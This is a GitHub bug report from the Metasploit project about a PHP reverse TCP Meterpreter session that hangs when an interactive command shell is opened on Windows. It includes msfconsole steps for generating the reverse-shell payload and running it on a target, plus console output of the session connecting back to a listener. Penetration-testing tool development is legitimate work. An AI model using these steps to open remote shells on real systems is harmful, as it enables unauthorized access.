PHP Reverse TCP Meterpreter hangs and timeouts with system command shell #18246

Closed
cdelafuente-r7 opened this issue Aug 2, 2023 · 3 comments
Labels
bug Stale Marks an issue as stale, to be closed if no action is taken

Comments

@cdelafuente-r7
Contributor

Steps to reproduce

How'd you do it?

  1. Do: use php/meterpreter/reverse_tcp
  2. Do: set lhost <local IP>
  3. Do: generate -f raw
  4. Copy the generated PHP code
  5. Do: to_handler

On the Windows target:

  1. Open a command line shell (cmd)
  2. Change to the directory where PHP is installed
  3. Run an interactive PHP shell: php.exe -a
  4. Paste the generated PHP code and hit enter

The Meterpreter session is established and works with commands like getuid, sysinfo, ls, ps, etc.
However, when starting a shell with the shell command, it hangs when entering shell commands (timeout).

Expected behavior

Shell commands should execute correctly.

Current behavior

msf6 payload(php/meterpreter/reverse_tcp) >
[*] Sending stage (39927 bytes) to 192.168.100.146
[*] Meterpreter session 5 opened (192.168.100.1:4444 -> 192.168.100.146:50581) at 2023-08-02 14:44:24 +0200

msf6 payload(php/meterpreter/reverse_tcp) > sessions -i 5
[*] Starting interaction with 5...

meterpreter > sysinfo
Computer    : WIN112H22
OS          : Windows NT WIN112H22 10.0 build 22621 (Windows 11) AMD64
Meterpreter : php/windows
meterpreter > getuid
Server username:
meterpreter > shell
Process 10328 created.
Channel 0 created.
Microsoft Windows [Version 10.0.22621.1555]
(c) Microsoft Corporation. All rights reserved.

C:\php>ls
 ---- [hang] ----
Terminate channel 0? [y/N]  y
[-] Error running command shell: Rex::TimeoutError Send timed out

Metasploit version

Framework: 6.3.28-dev-11fb61c3b6
Console  : 6.3.28-dev-11fb61c3b6

Additional Information

I was able to reproduce this issue on both Windows Server 2016 with PHP version 7.4.3 and Windows 11 22H2 with PHP version 8.9.0.
The original PR where this problem was reported: #18211

@sempervictus
Contributor

Is it meterp or php on windows that's at fault here?

@github-actions

github-actions bot commented Sep 5, 2023

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here.
If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot added the Stale Marks an issue as stale, to be closed if no action is taken label Sep 5, 2023
@github-actions

github-actions bot commented Oct 5, 2023

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it.
Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

@github-actions github-actions bot closed this as completed Oct 5, 2023